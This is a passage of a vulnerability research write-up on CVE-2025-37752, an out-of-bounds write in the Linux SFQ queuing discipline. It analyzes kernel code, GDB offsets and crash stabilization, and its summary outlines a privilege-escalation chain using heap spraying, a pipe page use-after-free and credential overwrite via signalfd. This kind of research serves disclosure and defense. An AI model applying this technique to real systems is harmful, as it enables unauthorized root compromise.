CVE-2025-37752 is an Array-Out-Of-Bounds vulnerability in the Linux network packet scheduler, specifically in the SFQ queuing discipline. An invalid SFQ limit and a series of interactions between SFQ and the TBF Qdisc can lead to a 0x0000 being written approximately 256KB out of bounds at a misaligned offset. If properly exploited, this can enable privilege escalation.

Overview

SFQ is a classless queueing discipline designed to ensure fair bandwidth distribution among various network data flows.

When used as a child of a TBF Qdisc, if the SFQ limit is set to one, a series of interactions between the two Qdiscs may lead to an underflow in the sfq_dec() function when the slot qlen is decremented from zero. This can result in a 16-bit value being written approximately 256KB out of bounds when the underflowed qlen is used as an index into the sfq_sched_data dep array in sfq_link().

The original crash was triggered by Syzkaller and addressed by Google. However, the initial patch could still be bypassed, allowing the limit to be indirectly set to one. The bug has been fixed by commits 8c0cea59d40cf6dd13c2950437631dd614fbade6 and b3bf8f63e6179076b57c9de660c9f80b5abefe70. The first commit created a temporary area to process the Qdisc parameters, while the second moved the limit check to the end of the function. All kernel versions prior to these commits that have CONFIG_NET_SCH_SFQ and CONFIG_USER_NS enabled are affected.

In this article, after analyzing the vulnerability, we will explore how I went from “This is just a DoS” to “This is impossible to exploit” to ultimately causing a page-UAF that allowed me to compromise all of Google’s kernelCTF instances with the same binary.

TL;DR
  • Spray sfq_slots in kmalloc-64 to prevent an immediate kernel crash when the bug is triggered.
  • Prevent a type-confused skb from being dequeued by reconfiguring the TBF Qdisc. Drop TBF rate and add packet overhead before the OOB write occurs.
  • Use the 0x0000 written 262636 bytes OOB to corrupt the pipe->files field of a named pipe, free the pipe, cause page-level UAF and get arbitrary R/W in that page.
  • Reclaim the freed page with signalfd files and use the page-level R/W primitive to swap file->private_data with file->f_cred.
  • Get root by overwriting the process credentials with zeros via signalfd4().

Vulnerability Analysis

When a SFQ Qdisc is initialized, sfq_change() is called. Despite an initial check explicitly prohibiting a limit equal to one, the Qdisc limit can still be indirectly set to this value when other Qdisc parameters are updated:

static int sfq_change(struct Qdisc *sch, struct nlattr *opt,
		      struct netlink_ext_ack *extack)
{
	// ...
	
	// Initial check prohibiting limit == 1
	if (ctl->limit == 1) {
		NL_SET_ERR_MSG_MOD(extack, "invalid limit");
		return -EINVAL;
	}
	
	// ...

	if (ctl->flows)
		q->maxflows = min_t(u32, ctl->flows, SFQ_MAX_FLOWS);
	if (ctl->divisor) {
		q->divisor = ctl->divisor;
		q->maxflows = min_t(u32, q->maxflows, q->divisor);
	}
	if (ctl_v1) {
		if (ctl_v1->depth)
			q->maxdepth = min_t(u32, ctl_v1->depth, SFQ_MAX_DEPTH);
		// ...
	}
	if (ctl->limit) {
		// Here if q->maxdepth = 1 and q->maxflows = 1
		// The ctl->limit == 1 check above can be bypassed and q->limit set to 1
		q->limit = min_t(u32, ctl->limit, q->maxdepth * q->maxflows);
		q->maxflows = min_t(u32, q->maxflows, q->limit);
	}
	
	// ...
}
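To make the bypass concrete, here is a minimal Python sketch of the parameter logic in the excerpt above. It is a model, not kernel code: the function name sfq_change_model() is hypothetical, and the constants and starting defaults (SFQ_MAX_DEPTH = 127, SFQ_DEFAULT_FLOWS = 128, SFQ_MAX_FLOWS) are my assumptions about what sfq_init() sets up before sfq_change() runs.

```python
# Model of the limit computation shown in the sfq_change() excerpt.
# Constants and defaults are assumptions, not copied from a specific kernel tree.
SFQ_MAX_DEPTH = 127
SFQ_DEFAULT_FLOWS = 128
SFQ_MAX_FLOWS = 0x10000 - SFQ_MAX_DEPTH - 1


def sfq_change_model(ctl_limit, ctl_flows=0, ctl_divisor=0, ctl_depth=0):
    """Return the effective q->limit for the given user-supplied parameters."""
    # Initial check prohibiting limit == 1
    if ctl_limit == 1:
        raise ValueError("invalid limit")

    # Assumed state before the update
    maxdepth = SFQ_MAX_DEPTH
    maxflows = SFQ_DEFAULT_FLOWS
    limit = SFQ_MAX_DEPTH

    if ctl_flows:
        maxflows = min(ctl_flows, SFQ_MAX_FLOWS)
    if ctl_divisor:
        maxflows = min(maxflows, ctl_divisor)
    if ctl_depth:
        maxdepth = min(ctl_depth, SFQ_MAX_DEPTH)
    if ctl_limit:
        # The clamp happens after the check, so limit can still end up at 1
        limit = min(ctl_limit, maxdepth * maxflows)
        maxflows = min(maxflows, limit)
    return limit


# Requesting limit = 2 passes the check, but depth = 1 and flows = 1 clamp it to 1
bypassed_limit = sfq_change_model(ctl_limit=2, ctl_flows=1, ctl_depth=1)
print(bypassed_limit)
```

The point of the sketch is the ordering: the check looks at the requested value, while the value that is actually stored is computed later from the other parameters.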

q->limit determines the maximum number of packets in the Qdisc queue. In sfq_enqueue(), when a new packet arrives, if the Qdisc queue length (aka qlen) exceeds this limit, the packet is dropped:

static int
sfq_enqueue(struct sk_buff *skb, struct Qdisc *sch, struct sk_buff **to_free)
{
	// ...

	if (++sch->q.qlen <= q->limit)
		return NET_XMIT_SUCCESS;

	qlen = slot->qlen;
	dropped = sfq_drop(sch, to_free);

	// ...
}

If q->limit is set to one and packets are sent to the network interface in a burst, a complex chain of interactions between TBF and SFQ can lead to multiple bugs, including an array out-of-bounds write vulnerability.

Let’s explore step by step what happens if we send three packets in a burst to a network interface configured as follows:

qdisc tbf 1: root refcnt 2 rate 640bit burst 100b lat 124s 
qdisc sfq 2: parent 1:10 limit 1p quantum 1014b depth 1 divisor 1024

Packet A is sent (skb_A)

tbf_enqueue() is called, which in turn calls sfq_enqueue(). The packet is correctly enqueued, SFQ qlen is incremented to 1:

tbf_enqueue()
    qdisc_enqueue()
        sfq_enqueue() // SFQ qlen is 0
            slot = q->slots[0]
            slot_queue_add()
                slot->skblist_next = skb_A
                slot->skblist_prev = skb_A
            q->tail = slot
            ++sch->q.qlen // SFQ qlen = 1
            // SFQ qlen <= limit, skb_A is enqueued

tbf_dequeue() is called. Since the sch->gso_skb list is empty, sfq_dequeue() is invoked, and the packet is correctly dequeued. SFQ qlen is decremented to 0. So far so good:

tbf_dequeue()
    qdisc_peek_dequeued()
        skb_peek(&sch->gso_skb) // sch->gso_skb is empty
        sfq_dequeue() // SFQ qlen is 1
            slot = q->tail
            slot_dequeue_head()
                skb_A = slot->skblist_next
                slot->skblist_next = slot
                slot->skblist_prev = slot
            sch->q.qlen-- // SFQ qlen = 0
        __skb_queue_head(&sch->gso_skb, skb);
        sch->q.qlen++ // SFQ qlen = 1
    // TBF has enough tokens, so the packet can be dequeued
    qdisc_dequeue_peeked()
        skb_A = __skb_dequeue(&sch->gso_skb)
        sch->q.qlen-- // SFQ qlen = 0

Packet B is sent (skb_B)

tbf_enqueue() is called, which in turn calls sfq_enqueue(). The packet is correctly enqueued, SFQ qlen is incremented to 1:

tbf_enqueue()
    qdisc_enqueue()
        sfq_enqueue() // SFQ qlen is 0
            slot = q->slots[0]
            slot_queue_add()
                slot->skblist_next = skb_B
                slot->skblist_prev = skb_B
            q->tail = slot
            ++sch->q.qlen // SFQ qlen = 1
            // SFQ qlen <= limit, skb_B is enqueued

tbf_dequeue() is called, which in turn calls sfq_dequeue(). The packet is correctly dequeued from SFQ, but TBF ran out of tokens, so it reschedules itself for later using qdisc_watchdog_schedule_ns(). The SFQ qlen remains 1, as packet B is still considered to be in the queue (it is actually in the gso_skb list):

tbf_dequeue()
    qdisc_peek_dequeued()
        skb_peek(&sch->gso_skb) // sch->gso_skb is empty
        sfq_dequeue() // SFQ qlen is 1
            slot = q->tail
            slot_dequeue_head()
                skb_B = slot->skblist_next
                slot->skblist_next = slot
                slot->skblist_prev = slot
            sch->q.qlen-- // SFQ qlen = 0
        __skb_queue_head(&sch->gso_skb, skb);
        sch->q.qlen++ // SFQ qlen = 1 
    
    // TBF runs out of tokens, reschedules itself for later
    qdisc_watchdog_schedule_ns()

Packet C is sent (skb_C)

tbf_enqueue() is called, which in turn calls sfq_enqueue(). Packet C is added to the first SFQ slot, q->tail is set to slot, and the SFQ qlen is incremented from 1 (packet B is still enqueued!) to 2. However, since qlen is now greater than q->limit, the packet is dropped.

sfq_drop() uses slot_dequeue_tail() to remove the packet from the slot. Now the slot->skblist_next and slot->skblist_prev fields point to the slot itself. Finally, SFQ qlen is decremented to 1.

Notice how q->tail is not NULL at this point: it still corresponds to slot, but now slot->skblist_next and slot->skblist_prev point to the slot itself rather than to a valid sk_buff:

tbf_enqueue()
    qdisc_enqueue()
        sfq_enqueue() // SFQ qlen = 1
            slot = q->slots[0]
            slot_queue_add()
                slot->skblist_next = skb_C
                slot->skblist_prev = skb_C
            q->tail = slot // [1]
            ++sch->q.qlen // SFQ qlen = 2
            // SFQ qlen > limit, skb_C is dropped
            sfq_drop()
                slot_dequeue_tail()
                    // skb_C removed from the slot
                    slot->skblist_next = slot
                    slot->skblist_prev = slot
                sch->q.qlen-- // SFQ qlen = 1

tbf_dequeue() attempts to dequeue packet B from the sch->gso_skb list, but it is still out of tokens, so it reschedules itself once again:

tbf_dequeue()
    qdisc_peek_dequeued()
        skb_peek(&sch->gso_skb) // sch->gso_skb is _not_ empty (contains Packet B)
    // TBF is still out of tokens, reschedules itself for later
    qdisc_watchdog_schedule_ns()

The first qdisc-watchdog timer fires

Approximately 1 second later (the time depends on the TBF configuration), the Qdisc watchdog timer fires, and tbf_dequeue() is called again. Packet B is removed from the sch->gso_skb list and correctly dequeued. The SFQ qlen is decremented to 0:

tbf_dequeue()
    qdisc_peek_dequeued()
        skb_peek(&sch->gso_skb) // sch->gso_skb is NOT empty
    qdisc_dequeue_peeked()
        skb_B = __skb_dequeue(&sch->gso_skb) // Remove the packet from sch->gso_skb
        sch->q.qlen-- // SFQ qlen = 0

The second qdisc-watchdog timer fires (and things go bad)

The second Qdisc watchdog timer fires. Now the sch->gso_skb list is empty, so sfq_dequeue() is called. However, since q->tail is not NULL, slot_dequeue_head() is used to dequeue the skb. The issue arises because slot_dequeue_tail() in sfq_drop() set slot->skblist_next and slot->skblist_prev to the address of the slot itself, so a type confusion between a sk_buff and a sfq_slot occurs.

sfq_dec() is then called and the SFQ slot qlen is decremented from zero, resulting in an underflow. The underflowed qlen is subsequently used as an index in the q->dep array (q here is a sfq_sched_data structure), and this is where the out-of-bounds write occurs:

tbf_dequeue()
    qdisc_peek_dequeued()
        skb_peek(&sch->gso_skb) // sch->gso_skb is empty
        sfq_dequeue() // SFQ qlen = 0
            slot = q->tail
            slot_dequeue_head()
                skb = slot->skblist_next // but slot->skblist_next = slot, TYPE CONFUSION!
            sfq_dec()
                q->slots[0].qlen--; // slot qlen = 0xFFFF, UNDERFLOW!
                sfq_link()
                    qlen = slot->qlen // 0xFFFF
                    ...
                    q->dep[qlen].next = 0; // 0x0000 written OOB!

    // TBF runs out of tokens, reschedules itself for later
    qdisc_watchdog_schedule_ns()
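The whole sequence can be replayed with a small toy model. This is a sketch under heavy simplifications: it tracks only the counters and lists named in the traces above, assumes a single slot, and replaces the token bucket with a has_tokens flag. The class ToyTbfSfq and its method names are hypothetical and do not exist in the kernel.

```python
class ToyTbfSfq:
    """Toy model of the counters in the traces above; not kernel code."""

    def __init__(self, limit=1):
        self.limit = limit
        self.sch_qlen = 0       # sch->q.qlen of the SFQ Qdisc
        self.slot_qlen = 0      # q->slots[0].qlen, a u16 in the kernel
        self.slot_skbs = []     # empty list == slot pointing to itself
        self.tail_set = False   # q->tail != NULL
        self.gso_skb = []       # sch->gso_skb list

    def enqueue(self, skb):
        self.slot_skbs.append(skb)
        self.slot_qlen = (self.slot_qlen + 1) & 0xFFFF
        self.tail_set = True
        self.sch_qlen += 1
        if self.sch_qlen <= self.limit:
            return "enqueued"
        # sfq_drop(): the packet leaves the slot, but q->tail stays set
        self.slot_skbs.pop()
        self.slot_qlen = (self.slot_qlen - 1) & 0xFFFF
        self.sch_qlen -= 1
        return "dropped"

    def _sfq_dequeue(self):
        if not self.tail_set:
            return None
        # An empty slot "returns itself": this is the type confusion
        skb = self.slot_skbs.pop(0) if self.slot_skbs else "sfq_slot"
        self.slot_qlen = (self.slot_qlen - 1) & 0xFFFF  # u16 wraparound
        self.sch_qlen -= 1
        if self.slot_qlen == 0:
            self.tail_set = False
        return skb

    def tbf_dequeue(self, has_tokens):
        if not self.gso_skb:  # qdisc_peek_dequeued()
            skb = self._sfq_dequeue()
            if skb is None:
                return None
            self.gso_skb.append(skb)
            self.sch_qlen += 1
        if not has_tokens:    # watchdog would be rescheduled here
            return None
        self.sch_qlen -= 1    # qdisc_dequeue_peeked()
        return self.gso_skb.pop(0)


sim = ToyTbfSfq(limit=1)
results = [
    sim.enqueue("skb_A"),
    sim.tbf_dequeue(has_tokens=True),
    sim.enqueue("skb_B"),
    sim.tbf_dequeue(has_tokens=False),
    sim.enqueue("skb_C"),
    sim.tbf_dequeue(has_tokens=False),
    sim.tbf_dequeue(has_tokens=True),   # first watchdog timer
    sim.tbf_dequeue(has_tokens=False),  # second watchdog timer
]
print(results, hex(sim.slot_qlen), sim.gso_skb)
```

After the last call, the model ends with the slot qlen wrapped to 0xFFFF and the slot itself parked in the gso_skb list, which mirrors the state described in the final trace.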

Interestingly, FizzBuzz101 and I recently discovered a bug that allowed us to crash five different Qdiscs. Initially, we thought the root cause was different, but thanks to the kernel developer Cong Wang, we conducted further analysis and realized it was due to an interaction between the Qdiscs and TBF, very similar to the case described above! The discussion can be found here.

In-Depth Analysis (GDB Time)

Using GDB, we can inspect what happens when the Qdisc watchdog timer fires for the second time and the series of bugs is triggered. By setting a breakpoint at sfq_dequeue(), we can clearly see that after calling slot_dequeue_head(), the returned skb address and the sfq_slot address are the same. A type confusion occurred:

static struct sk_buff *
sfq_dequeue(struct Qdisc *sch)
{
	// ...

	a = q->tail->next; // a = 0
	slot = &q->slots[a]; // first (and only) slot retrieved

	// ...

	skb = slot_dequeue_head(slot); // Type confusion, skb is a sfq_slot!
	sfq_dec(q, a); // OOB write

	// ...
}

static inline struct sk_buff *slot_dequeue_head(struct sfq_slot *slot)
{
	struct sk_buff *skb = slot->skblist_next; // slot->skblist_next == slot, so skb = slot

	slot->skblist_next = skb->next;
	skb->next->prev = (struct sk_buff *)slot;
	skb->next = skb->prev = NULL;
	return skb;
}

If we step into the sfq_dec() function, we can observe how the slot qlen is decremented from 0, causing an underflow (qlen is a u16, so it will become 0xFFFF):

static inline void sfq_dec(struct sfq_sched_data *q, sfq_index x) // x = 0x0000
{
	sfq_index p, n;
	int d;

	// ...
	d = q->slots[x].qlen--; // Underflow, qlen = 0xFFFF
	// ...
	
	sfq_link(q, x);
}

Finally, by stepping into sfq_link(), we can see how the qlen value, now 0xFFFF, is used as an index in the sfq_sched_data dep array. Since this array can hold a maximum of SFQ_MAX_DEPTH + 1 (127 + 1) entries, each 4 bytes in size (two 16-bit indices), the index 0xFFFF causes a write roughly 256KB past the start of the array:

static inline void sfq_link(struct sfq_sched_data *q, sfq_index x)
{
	sfq_index p, n;
	struct sfq_slot *slot = &q->slots[x];
	int qlen = slot->qlen; // qlen = 0xFFFF

	// ...

	q->dep[qlen].next = x; // 0x0000 written OOB
	sfq_dep_head(q, n)->prev = x;
}
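The size of the overshoot can be estimated with a few lines of Python. This sketch assumes that each dep entry is a struct sfq_head made of two u16 indices (next and prev) and that SFQ_MAX_DEPTH is 127; the SfqHead class is only a ctypes stand-in for that layout.

```python
import ctypes


class SfqHead(ctypes.Structure):
    """Assumed layout of one dep[] entry: two 16-bit indices."""
    _fields_ = [("next", ctypes.c_uint16), ("prev", ctypes.c_uint16)]


SFQ_MAX_DEPTH = 127  # assumption

entry_size = ctypes.sizeof(SfqHead)
dep_bytes = (SFQ_MAX_DEPTH + 1) * entry_size

# Decrementing a u16 from zero wraps around to 0xFFFF
underflowed_qlen = (0 - 1) & 0xFFFF

# Byte offset of dep[qlen].next relative to the start of the dep array
write_offset = underflowed_qlen * entry_size + SfqHead.next.offset
overshoot = write_offset - dep_bytes

print(entry_size, dep_bytes, hex(write_offset), overshoot)
```

Under these assumptions the array is only 512 bytes long, while the write lands at byte offset 0x3FFFC from its start, which matches the "approximately 256KB" figure.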

We know the address of sfq_sched_data and the offset of sfq_sched_data (privdata) in the Qdisc structure (0x180 bytes). From this we can derive the address of the current Qdisc object.

Using GDB we can also determine where the 0x0000 is written out of bounds. By subtracting the current object address from this value, we can obtain the distance between the Qdisc object and the victim address:

sfq_sched_data_addr = 0xffff88802e537980
oob_write_addr = 0xffff88802e5779ec
privdata_offset_in_qdisc = 0x180 # sfq_sched_data offset in Qdisc

qdisc_addr = sfq_sched_data_addr - privdata_offset_in_qdisc
distance = oob_write_addr - qdisc_addr

print(hex(distance)) # 0x401EC or 262636 bytes

So we have a 0x0000 written only 262636 bytes after the vulnerable Qdisc object. Things are getting interesting.
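As a sanity check, the distance can be broken into its parts. The sketch below reuses the addresses from the GDB session above and assumes 4-byte dep entries and 4096-byte pages; the value it derives for the offset of dep inside sfq_sched_data is implied by those numbers, not read from the kernel headers.

```python
# Addresses observed in GDB (from the snippet above)
SFQ_SCHED_DATA_ADDR = 0xffff88802e537980
OOB_WRITE_ADDR = 0xffff88802e5779ec
PRIVDATA_OFFSET = 0x180

# Assumptions: dep[] entries are 4 bytes, pages are 4 KiB
SFQ_HEAD_SIZE = 4
PAGE_SIZE = 4096
UNDERFLOWED_QLEN = 0xFFFF

qdisc_addr = SFQ_SCHED_DATA_ADDR - PRIVDATA_OFFSET
distance = OOB_WRITE_ADDR - qdisc_addr

# Part of the distance contributed by the out-of-range index
index_bytes = UNDERFLOWED_QLEN * SFQ_HEAD_SIZE

# Whatever remains must be the offset of dep[] inside sfq_sched_data
implied_dep_offset = OOB_WRITE_ADDR - SFQ_SCHED_DATA_ADDR - index_bytes

# Where the write lands relative to page boundaries
pages, page_offset = divmod(distance, PAGE_SIZE)

print(hex(distance), hex(implied_dep_offset), pages, hex(page_offset))
```

The split shows that the write lands 64 pages past the Qdisc object, at offset 0x1EC within the target page.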

This Is Not Exploitable…

At this point, I honestly thought this was impossible to exploit. I also showed the bug and provided a quick explanation to FizzBuzz101, and he agreed. The 256KB+ out-of-bounds write primitive at a misaligned offset (0x1EC) seemed extremely limited, and as if that weren’t enough, the kernel was crashing right after sfq_dec() due to an invalid pointer access. However, I decided to persist and continued with further investigation.

We need to keep in mind that due to the sk_buff/sfq_slot type confusion, the skb returned by slot_dequeue_head() in sfq_dequeue() is not actually a skb, but rather a sfq_slot.

Dr. Evil attempting to explain to his crew that the skb is not really an skb

This means that every access to this "skb" translates to an access to a sfq_slot, which can potentially lead to a crash. For instance, the kernel will immediately panic right after the out-of-bounds write in sfq_dec(), due to an invalid pointer access in qdisc_bstats_update(sch, skb):

static struct sk_buff *
sfq_dequeue(struct Qdisc *sch)
{
	// ...

	skb = slot_dequeue_head(slot); // Type confusion, skb is a sfq_slot
	sfq_dec(q, a); // OOB write!
	qdisc_bstats_update(sch, skb); // Kernel panic! :(
	
	// ...
}

But this is not the only problem we need to address if we want to exploit the vulnerability. If the "skb" is dequeued from both SFQ and TBF, it will inevitably lead to a crash when it is processed further.

Stabilization: Addressing The First Kernel Panic In qdisc_bstats_update()

The first kernel crash occurs in qdisc_bstats_update(), right after the sfq_dec() call. qdisc_bstats_update() is defined as follows:

#define skb_shinfo(SKB)	((struct skb_shared_info *)(skb_end_pointer(SKB)))

static inline void qdisc_bstats_update(struct Qdisc *sch,
				       const struct sk_buff *skb)
{
	bstats_update(&sch->bstats, skb);
}

static inline void bstats_update(struct gnet_stats_basic_sync *bstats,
				 const struct sk_buff *skb)
{
	_bstats_update(bstats,
		       qdisc_pkt_len(skb),
		       skb_is_gso(skb) ? skb_shinfo(skb)->gso_segs : 1); // [1]
}

static inline bool skb_is_gso(const struct sk_buff *skb)
{
	return skb_shinfo(skb)->gso_size;
}

static inline unsigned char *skb_end_pointer(const struct sk_buff *skb)
{
	return skb->head + skb->end;
}

The crash is caused by bstats_update(). This function is using skb_is_gso() to access the gso_size field of the skb_shared_info structure associated with the sk_buff.

skb_is_gso() utilizes the macro skb_shinfo(), which uses skb_end_pointer(). This, in turn, relies on the skb->head pointer and skb->end of the sk_buff to determine where the packet data ends and the actual skb_shared_info begins.

Now, offsetof(struct sk_buff, head) = 192, but in our case, the "skb" is actually a sfq_slot, which is allocated in kmalloc-64. Therefore, an access to skb->head at offset 192 translates to an access to the first qword of another object in kmalloc-64, specifically, the first qword of the third object after the "skb". If this qword does not contain a valid pointer, the kernel crashes when the pointer is dereferenced to access ->gso_size.

The slots array is allocated by sfq_init() using sfq_alloc(), a kvmalloc wrapper. Each sfq_slot is 64 bytes in size and the number of slots in the array depends on q->maxflows. Our SFQ configuration only has a single flow, which results in a single slot allocated in kmalloc-64 per Qdisc.

// ...
q->slots = sfq_alloc(sizeof(q->slots[0]) * q->maxflows);
// ...

If we want to prevent the kernel from crashing, we need to populate the kmalloc-64 slab with objects that have a valid pointer as their first qword. Luckily, we don’t need to look too far. When a sfq_slot is initialized, the first and second qwords are set to its own address, so we can fake a valid skb->head pointer by spraying sfq_slot(s) in kmalloc-64.

struct sfq_slot {
	struct sk_buff	*skblist_next;
	struct sk_buff	*skblist_prev;
	// ...
};

static inline void slot_queue_init(struct sfq_slot *slot)
{
	memset(slot, 0, sizeof(*slot));
	slot->skblist_prev = slot->skblist_next = (struct sk_buff *)slot;
}

Offset 192, relative to the type-confused sfq_slot, corresponds to the slot->skblist_next pointer of the third slot after the current one. After the spray, that field holds the address of its own slot, so skb->head resolves to a valid pointer.
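The effect of the spray can be illustrated with a small memory model. This is an idealized sketch: it assumes the sprayed sfq_slot objects sit back to back in one kmalloc-64 slab, uses a made-up base address, and models only the two self-referencing qwords written by slot_queue_init(). The helper names are hypothetical.

```python
import struct

SLOT_SIZE = 64          # kmalloc-64 object size
SKB_HEAD_OFFSET = 192   # offsetof(struct sk_buff, head), from the text


def spray_slots(base, count):
    """Model `count` adjacent sfq_slot objects, each initialized to point to itself."""
    mem = bytearray(SLOT_SIZE * count)
    for i in range(count):
        addr = base + i * SLOT_SIZE
        # skblist_next and skblist_prev both hold the slot's own address
        struct.pack_into("<QQ", mem, i * SLOT_SIZE, addr, addr)
    return mem


def read_skb_head(mem, base, fake_skb_addr):
    """Read what the kernel would see as skb->head for a type-confused slot."""
    offset = fake_skb_addr - base + SKB_HEAD_OFFSET
    return struct.unpack_from("<Q", mem, offset)[0]


base = 0xffff888000100000            # hypothetical slab address
mem = spray_slots(base, 8)
confused = base + 1 * SLOT_SIZE      # the slot mistaken for an skb
head = read_skb_head(mem, base, confused)

slots_ahead, remainder = divmod(SKB_HEAD_OFFSET, SLOT_SIZE)
print(hex(head), slots_ahead, remainder)
```

In this model skb->head reads the first qword of the object three slots ahead, which is that slot's own address and therefore a mapped kernel pointer.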

This was an easy win. Now let’s address the second kernel panic when the "skb" is dequeued from both SFQ and TBF.

Stabilization: Addressing The Second Kernel Panic In validate_xmit_skb()

After the type confusion and the out-of-bounds write, sfq_dequeue() will return the type-confused "skb" in tbf_dequeue() which in turn will return it in dequeue_skb(). This function will pass the dequeued "skb" to sch_direct_xmit(), which will call validate_xmit_skb_list(). This will lead to a call to validate_xmit_skb(), where the kernel will crash due to another invalid pointer access:

...
    dequeue_skb()
        tbf_dequeue()
           sfq_dequeue()
    sch_direct_xmit()
        validate_xmit_skb_list()
            validate_xmit_skb() // Kernel panic!

Now, I won’t dig too much into it, but having a sk_buff type confused with a sfq_slot wandering around the kernel is not a good idea. Therefore, instead of trying to fake pointers in kmalloc-64 as we did to address the previous crash, we want to tackle the root cause and prevent the packet from being dequeued.

I could not find a way to prevent SFQ from dequeuing the "skb", so I decided to focus on TBF. Here is the tbf_dequeue() function:

static struct sk_buff *tbf_dequeue(struct Qdisc *sch)
{
	struct tbf_sched_data *q = qdisc_priv(sch);
	struct sk_buff *skb;

	skb = q->qdisc->ops->peek(q->qdisc); // "skb" returned by sfq_dequeue()

	if (skb) {
		s64 now;
		s64 toks;
		s64 ptoks = 0;
		unsigned int len = qdisc_pkt_len(skb); // [6]

		now = ktime_get_ns();
		toks = min_t(s64, now - q->t_c, q->buffer);

		// ...

		toks += q->tokens; // [4]
		if (toks > q->buffer)
			toks = q->buffer; // [5]
		toks -= (s64) psched_l2t_ns(&q->rate, len); // [3]

		//  Here we need toks|ptoks to be < 0
		if ((toks|ptoks) >= 0) { // [1]
			skb = qdisc_dequeue_peeked(q->qdisc);
			if (unlikely(!skb))
				return NULL;

			// ...

			return skb;
		}

		qdisc_watchdog_schedule_ns(&q->watchdog,
					   now + max_t(long, -toks, -ptoks)); // [2]

		qdisc_qstats_overlimit(sch);
	}
	return NULL;
}

In tbf_dequeue(), if the number of remaining tokens is non-negative, the packet is dequeued [1]. Otherwise, the Qdisc reschedules itself for later using qdisc_watchdog_schedule_ns() [2]. In this case, the negated token count is the number of nanoseconds to wait before rescheduling.

To prevent the packet from being dequeued, we need to solve a min/max problem. We want to minimize toks and maximize the value returned by psched_l2t_ns(), so that when this value is subtracted from toks, we can obtain a negative number (the lower, the better). [3]

This approach looks promising, as we can indirectly minimize toks by controlling q->buffer and q->tokens in tbf_change() [4] [5]. Additionally, we can (probably) maximize the "skb" packet length (keep in mind that our skb is a sfq_slot) [6] by controlling a sfq_slot field.
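The token arithmetic is easier to reason about with numbers. The sketch below models only the toks path of the excerpt and ignores ptoks (the peak rate). It approximates psched_l2t_ns() as (len + overhead) converted to nanoseconds at the configured byte rate, which is a simplification of the real fixed-point computation, and it assumes q->buffer and q->tokens are expressed in nanoseconds. The function names are hypothetical.

```python
NSEC_PER_SEC = 1_000_000_000


def l2t_ns(length, rate_bytes_per_sec, overhead=0):
    """Approximate time, in ns, needed to send `length` bytes at the given rate."""
    return (length + overhead) * NSEC_PER_SEC // rate_bytes_per_sec


def tbf_decision(now, t_c, buffer_ns, tokens_ns, pkt_len, rate, overhead=0):
    """Mirror the toks computation and the dequeue/reschedule decision."""
    toks = min(now - t_c, buffer_ns)
    toks += tokens_ns
    if toks > buffer_ns:
        toks = buffer_ns
    toks -= l2t_ns(pkt_len, rate, overhead)
    if toks >= 0:
        return ("dequeue", 0)
    # The negated token count is the delay before the watchdog fires
    return ("wait", -toks)


rate = 640 // 8                      # 640 bit/s expressed in bytes per second
buffer_ns = l2t_ns(100, rate)        # a 100-byte burst, as in the tc output

small = tbf_decision(10 * NSEC_PER_SEC, 0, buffer_ns, 0, pkt_len=60, rate=rate)
large = tbf_decision(10 * NSEC_PER_SEC, 0, buffer_ns, 0, pkt_len=200, rate=rate)
print(small, large)
```

With a full bucket, the 60-byte packet is dequeued while the 200-byte one is postponed, so both a smaller buffer and a larger apparent length push the decision towards rescheduling.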

Attempt 1: Maximizing “Packet” Length (FAILED)

qdisc_pkt_len() calculates the size of a sk_buff by casting the skb->cb buffer to a qdisc_skb_cb and then accessing the pkt_len field:

static inline unsigned int qdisc_pkt_len(const struct sk_buff *skb)
{
	return qdisc_skb_cb(skb)->pkt_len;
}


static inline struct qdisc_skb_cb *qdisc_skb_cb(const struct sk_buff *skb)
{
	return (struct qdisc_skb_cb *)skb->cb;
}

struct sk_buff {
	// ...
	char	cb[48];		/*    40    48 */
	// ...
}

struct qdisc_skb_cb {
	struct {
		unsigned int	pkt_len;	/*     0     4 */
		// ...
	};
	// ...
};

As we can see, offsetof(struct sk_buff, cb) = 40 and offsetof(struct qdisc_skb_cb, pkt_len) = 0. Now, our "skb" is a sfq_slot, and offset 40 (0x28 in hexadecimal), overlaps (in the Google kernelCTF LTS 6.6.8* instances) with sfq_slot->vars.qcount.

The slot->vars.qcount field is automatically set to -1 by red_set_vars() when a new packet is enqueued in sfq_enqueue(). So we are fortunate: when the type confusion occurs, this results in a very large packet size, 0xFFFFFFFF.

However, our luck did not last very long. The memory layout of the sfq_slot structure differs from system to system. In Google COS 105, and generally for systems before Linux 6.6.8*, qdisc_skb_cb(skb)->pkt_len overlaps with slot->vars.qavg.

LTS 6.6.84 (Google kernelCTF VRP):

gef  ptype /ox struct sfq_slot
/* offset      |    size */  type = struct sfq_slot {
...
/* XXX  4-byte hole      */
/* 0x0028      |  0x0018 */    struct red_vars {
/* 0x0028      |  0x0004 */        int qcount;
/* 0x002c      |  0x0004 */        u32 qR;
/* 0x0030      |  0x0008 */        unsigned long qavg;
/* 0x0038      |  0x0008 */        ktime_t qidlestart;
                               } vars;
...

COS 105 (Google kernelCTF VRP):

gef  ptype /ox struct sfq_slot
/* offset      |    size */  type = struct sfq_slot {
...
/* 0x0020      |  0x0018 */    struct red_vars {
/* 0x0020      |  0x0004 */        int qcount;
/* 0x0024      |  0x0004 */        u32 qR;
/* 0x0028      |  0x0008 */        unsigned long qavg;
/* 0x0030      |  0x0008 */        ktime_t qidlestart;
                               } vars;

...
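The difference between the two layouts can be shown by reading the same four bytes from two modeled slots. This sketch assumes a little-endian machine, fills in only qcount and qavg at the offsets from the dumps above, and uses a made-up qavg value (0x1234) purely for illustration. The helper names are hypothetical.

```python
import struct

CB_OFFSET = 40   # offsetof(struct sk_buff, cb); pkt_len is its first field
SLOT_SIZE = 64


def make_slot(qcount_offset, qcount, qavg):
    """Build a 64-byte slot image with red_vars placed at the given offset."""
    slot = bytearray(SLOT_SIZE)
    struct.pack_into("<i", slot, qcount_offset, qcount)    # int qcount
    struct.pack_into("<Q", slot, qcount_offset + 8, qavg)  # unsigned long qavg
    return bytes(slot)


def confused_pkt_len(slot):
    """Value qdisc_pkt_len() would read if the slot were treated as an skb."""
    return struct.unpack_from("<I", slot, CB_OFFSET)[0]


# red_vars starts at 0x28 in the LTS dump and at 0x20 in the COS 105 dump
lts_slot = make_slot(0x28, qcount=-1, qavg=0x1234)
cos_slot = make_slot(0x20, qcount=-1, qavg=0x1234)

lts_len = confused_pkt_len(lts_slot)
cos_len = confused_pkt_len(cos_slot)
print(hex(lts_len), hex(cos_len))
```

On the LTS layout the read hits qcount and yields 0xFFFFFFFF, while on the COS 105 layout it returns the low 32 bits of qavg, whatever that field happens to hold.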